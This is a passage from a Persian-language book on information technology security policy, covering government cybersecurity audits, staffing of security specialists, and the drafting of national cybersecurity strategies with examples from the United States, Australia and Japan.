‫ﺗﺄﻳﻴــﺪ ﻳــﺎ ﺭﺩ ﻫﺰﻳﻨــﻪﻫــﺎﻱ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ‪ -‬ﺭﺍ‬
‫ﺑﺮ ﻋﻬـﺪﺓ ﺩﻓﺘـﺮ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪﺑﻨـﺪﻱ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‬
‫ﮔﺬﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﻳﻚ ﺍﻗﺪﺍﻡ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟـﺰﺍﻡ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪ ﻫـﺎ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﻤﻴـﺰﻱ ﺳـﺎﻻﻧﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻭ‬
‫ﮔﺰﺍﺭﺵ ﻧﺘﺎﻳﺞ ﺁﻥ ﺑﻪ ﺍﺩﺍﺭﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﺳﺎﺧﺘﺎﺭﻱ ﻛـﻪ‬
‫ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ‪ ،‬ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺁﻥ ﺑﺎﻳـﺪ ﺍﺯ ﻃـﺮﻑ ﺩﻓﺘـﺮ ﺭﻳﺎﺳـﺖ‬
‫ﺟﻤﻬﻮﺭﻱ ﻳﺎ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﺗﻌﻴـﻴﻦ ﮔـﺮﺩﺩ ﺗـﺎ ﺗﻤـﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﻧﺮﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﭼﺎﻟﺶ ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ‪ ،‬ﻣﺸﻜﻞ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﺍﺳـﺖ‪.‬‬
‫ﺩﻭﻟﺘﻬﺎ ﺑﺮﺍﻱ ﺟﺬﺏ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﭘﺮﺳـﻨﻞ ﻣﺘﺨـﺼﺺ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺍﺋـﻪ‬
‫ﺑﻮﺭﺱ ﺗﺤﺼﻴﻠﻲ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﻮﺭﺳﻬﺎ‪ ،‬ﺍﻓﺮﺍﺩ ﺑـﺮﺍﻱ ﺳـﺎﻟﻬﺎﻱ ﻣﺸﺨـﺼﻲ ﺗﻌﻬـﺪ‬
‫ﺧﺪﻣﺖ ﺑﻪ ﺩﻭﻟﺖ ﭘﻴﺪﺍ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﻳﻚ ﺭﺍﻩﺣﻞ ﻛﻮﺗﺎﻩﻣﺪﺕ ﻧﻴـﺰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﻭ ﻣﺮﺣﻠـﻪﺍﻱ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ‬
‫ﻛﺎﺭ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺗﻤﺎﻡ ﻳﺎ ﺑﺨـﺸﻲ ﺍﺯ ﺣﻘﻮﻗـﺸﺎﻥ ﺗﻮﺳـﻂ ﻛﺎﺭﻓﺮﻣـﺎﻱ‬
‫ﻲ ﺁﻧﻬﺎ ﭘﺮﺩﺍﺧﺖ ﮔﺮﺩﺩ‪ .‬ﻣﺸﻜﻞ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ‬
‫ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﻭ ﻫــﻢ ﺩﺭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻣﻮﺍﺟﻬﺔ ﺩﻭﻟـﺖ‬
‫ﺑﺎ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺩﻳﮕﺮﻱ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﻭﻟـﺖ ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺭﺷـﺘﻪ ﺩﺳـﺘﻤﺰﺩ‬
‫ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﭙﺮﺩﺍﺯﺩ‪.‬‬
‫‪٢٣٧‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫ﺭﻭﻧﺪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺑـﺰﺍﺭ ﻣـﺆﺛﺮﻱ‬
‫ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣـﺎﻟﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻣﻠـﻲ ﭼﻴـﺴﺘﻨﺪ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﭼـﻪ‬
‫ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﺷﺪ‪ ،‬ﻭ ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺍﺻـﻼﺣﺎﺗﻲ ﺩﺭ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﻱ‬
‫ﺑﺎﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ‬
‫ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠـﺎ ﻋﻤـﺪﺗﹰﺎ‬
‫ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻋﻨﺎﺻﺮ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ‬
‫ﻣﻲﺷﻮﻳﻢ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻧـﺪ‪.‬‬
‫ﺩﺭ ﺍﺩﺍﻣــﺔ ﺑﺨــﺶ ﭼﻬــﺎﺭﻡ ﻧﻘــﺶ ﺩﻭﻟــﺖ ﺭﺍ ﺩﺭ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣــﻮﺭﺩ ﺑﺤــﺚ ﻭ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ‬
‫ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪ .‬ﻣﺮﻭﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺗﻮﺍﻧـﺪ ﻓﻮﺍﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ‪:‬‬
‫ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭﺳـﻴﻌﺘﺮﻳﻦ ﻭ ﺑﻴـﺸﺘﺮﻳﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺩﺍﺷـﺘﻪ ﻭ ﺩﺭ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﻣﻄﺎﻟﺐ ﻭ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﻣﺸﺎﺑﻬﻲ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺟﺰﺋﻴـﺎﺕ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻭ‬
‫ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛـﺸﻮﺭ‬
‫ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ‪ ،‬ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﻣــﺸﺎﺑﻪ ﺭﻭﺷــﻲ ﺍﺳــﺖ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ‬
‫‪The National Strategy to Secure Cyberspace‬‬
‫]‪[U.S.‬‬
‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf‬‬
‫‪28‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺧﻮﺩ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑﺮﺧـﻲ ﻋﻨﺎﺻـﺮ ﻭ‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﺸﺘﺮﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪.۱‬‬
‫ﺍﺭﺯﻳــﺎﺑﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻣﻠــﻲ ﻭ ﺍﻧﺘــﺸﺎﺭ ﮔﺰﺍﺭﺷــﻬﺎﻱ‬
‫ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﻨﺪ ﻭ ﺑﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﻣﺮﺩﻡ ﺁﮔﺎﻫﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ؛‬
‫‪.۲‬‬
‫ﺍﻳﺠﺎﺩ ﺳﺎﺧﺘﺎﺭ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ؛‬
‫‪.۳‬‬
‫ﺗﻬﻴﺔ ﻳﻚ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﻣﻠﻲ ﺑـﺎ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﺑـﺎ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ؛‬
‫‪.۴‬‬
‫ﺗﻄﺒﻴﻖ ﻣﻘﺮﺭﺍﺕ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ‬
‫ﺍﺷﺘﺮﺍﻙ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻥ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ‪.‬‬
‫ﻓﺎﺯ ﺍﻭﻝ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﻔﺼﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔـﺎﻫﻲ‬
‫ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﺳـﺘﺮﺍﻟﻴﺎ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﮔﺰﺍﺭﺷـﻲ ﺗﺤـﺖ‬
‫ﻋﻨــﻮﺍﻥ ﺯﻳﺮﺳــﺎﺧﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻠــﻲ ﺍﺳــﺘﺮﺍﻟﻴﺎ‪ :‬ﺗﻬﺪﻳــﺪﻫﺎ ﻭ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎ‪ ٣١‬ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﻛﻪ ﺗﻮﺳـﻂ‬
‫ﻫﻴــﺄﺕ ﻣــﺪﻳﺮﺓ ﺷــﺮﻛﺖ ‪ Defense Signals‬ﺗﻨﻈــﻴﻢ ﺷــﺪ‬
‫ﺧﻮﺍﻧﻨﺪﻩ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﺎﻧﺪ ﻛﻪ ﺟﺎﻣﻌﺔ ﺍﺳﺘﺮﺍﻟﻴﺎ ﻧﺴﺒﺖ ﺑﻪ‬
‫ﻧﻘﺎﺋﺺ ﻧﺴﺒﺘﹰﺎ ﺯﻳﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳـﺖ ﻭ ﻧﻴـﺰ‬
‫ﻫﻴﭻ ﺳﺎﺧﺘﺎﺭ ﺭﺳﻤﻲ ﻭ ﻣﺸﺨـﺼﻲ ﺑـﺮﺍﻱ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺟﻬـﺖ ﺣﻔـﻆ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـﻲ ﻭﺟـﻮﺩ‬
‫‪۲۹‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﺷﻤﺎﺭﻩ ‪ ۱۷‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪http://www.kantei.go.jp/foreign/it/network/‬‬
‫‪priority-all/index.html‬‬
‫‪Australia's National Information Infrastructure:‬‬
‫‪Threats & Vulnerabilities‬‬
‫‪30‬‬
‫‪31‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺭﺣﺎﻝ‬
‫ﺭﺷﺪ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺁﻣﺎﺩﮔﻲ ﻻﺯﻡ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻣـــﻮﺍﺭﺩ ﺧـــﺎﺹ‪ ،‬ﭘﺎﺳـــﺦ ﺩﻭﻟـــﺖ ﻣﺮﻛـــﺰﻱ ﻣﻨﺎﺳـــﺒﺘﺮ ﻭ‬
‫ﻗﺎﺑﻞ ﻗﺒﻮﻝﺗﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻧﻈﺮ ﺩﺍﺧﻠﻲ‪ ،‬ﺗـﺪﺍﻭﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ‬
‫ﻧﻴﺎﺯﻣﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺳـﺎﻳﺒﺮ ﺧـﻮﺩ‬
‫ﺩﻭﻟﺖ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬـﺎ ﻭ‬
‫ﺧﺪﻣﺎﺕ ﺿﺮﻭﺭﻱ ﺁﻥ ﺍﺳـﺖ‪ .‬ﺍﺯ ﻧﻈـﺮ ﺧـﺎﺭﺟﻲ‪ ،‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺑﺎﻻﻱ ﺗﺒﺎﺩﻻﺕ ﻭ ﻣﻮﺍﻧـﻊ ﻗـﺎﻧﻮﻧﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻭﻗـﻮﻉ‬
‫ﻣﺸﻜﻼﺕ ﺑﺰﺭﮒ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻣﻲﺷﻮﻧﺪ؛ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﻭﻟـﺖ‬
‫ﺩﺭ ﻏﻴﺎﺏ ﻧﻴﺮﻭﻫﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﺸﻜﻼﺕ ﺑـﻪ ﻏﻴﺮﻗﺎﺑـﻞ ﺍﻧﺘـﺸﺎﺭ ﺷـﺪﻥ ﻣﻨـﺎﺑﻊ‬
‫ﺣﻴﺎﺗﻲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣـﻲﺍﻧﺠﺎﻣـﺪ‪ ،‬ﻧﻘـﺶ ﺩﻭﻟـﺖ ﺩﺭ‬
‫‪٢٨‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﻩ ﺭﻓﻊ ﻣﺸﻜﻼﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪".‬‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪ ٢٩.‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﺍﻣﻨﻴـﺖ ﻳـﻚ ﺟـﺰﺀ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺻـﻮﻝ ﺣﻘـﻮﻗﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴـﻪ ﭘـﻴﺶﻧـﻮﻳﺲ ﺑﺮﻧﺎﻣـﺔ ﻣﻠـﻲ ﺗﻮﺳـﻌﻪ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﮊﺍﭘـﻦ ﺩﺭ‬
‫ﻣــﺎﺭﺱ ‪ ۲۰۰۱‬ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣــﺔ ﺍﻭﻟﻮﻳــﺖﺑﻨــﺪﻱ‬
‫‪٣٠‬‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺧﻮﺩ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ e-Japan‬ﺗﺮﻛﻴﺐ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٣٨‬‬
‫ﻧﺪﺍﺭﺩ‪ ٣٢.‬ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌـﻪ ﺭﻭﻱ ﺍﻳـﻦ‬
‫ﻣﻮﺿــﻮﻉ ﺩﺭ ﺳــﺎﻝ ‪ ۱۹۹۶‬ﻫﻴــﺄﺗﻲ ﺑــﻪ ﻧــﺎﻡ ﻣﺠﻤــﻊ ﺣﻤﺎﻳــﺖ ﺍﺯ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‪ ٣٣‬ﻣﺘـﺸﻜﻞ ﺍﺯ ﺑﻌـﻀﻲ‬
‫ﻣﻘﺎﻣﺎﺕ ﺣﻘﻴﻘﻲ ﻭ ﺣﻘﻮﻗﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻊ ﻓﺎﻗﺪ ﻫﺮﮔﻮﻧﻪ‬
‫ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﻮﺩ ﻭ ﺳﺎﺧﺘﺎﺭ ﭘﺎﻳﺪﺍﺭ ﻭ ﺛﺎﺑﺘﻲ ﻧﺪﺍﺷـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﮔــﺰﺍﺭﺵ‪ ،‬ﻣـﺼﺎﺣﺒﻪ ﻭ ﺗﺤﻘﻴــﻖ ﻓـﺮﺍﻫﻢ ﻛــﺮﺩ ﻭ‬
‫ﮔﺰﺍﺭﺷﻲ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛﻪ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ‪ ،‬ﻣﻘﺎﻣـﺎﺕ‬
‫ﺣﻘﻮﻗﻲ‪ ،‬ﺭﺳﺎﻧﻪﻫﺎﻱ ﺟﻤﻌﻲ ﻭ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ‪ .‬ﺍﻳـﻦ ﻫﻴـﺄﺕ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﺭ ﺍﻛﺘﺒـﺮ ‪ ۱۹۹۷‬ﺍﺭﺍﺋـﻪ ﺩﺍﺩ ﻭ‬
‫ﺧﻮﺍﺳﺘﺎﺭ ﻫﻤﻜﺎﺭﻱ ﺻﻤﻴﻤﺎﻧﻪﺗﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﺷﺪ‪.‬‬
‫ﻓﺎﺯ ﺩﻭﻡ‪ ،‬ﺍﻳﺠـﺎﺩ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺛﺎﺑـﺖ ﺩﺭ ﺑﺨـﺶ ﺍﺟﺮﺍﻳـﻲ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ‬
